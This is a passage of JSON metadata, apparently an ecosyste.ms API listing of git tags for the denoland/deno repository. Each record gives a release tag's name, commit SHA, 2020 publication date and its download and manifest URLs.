48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/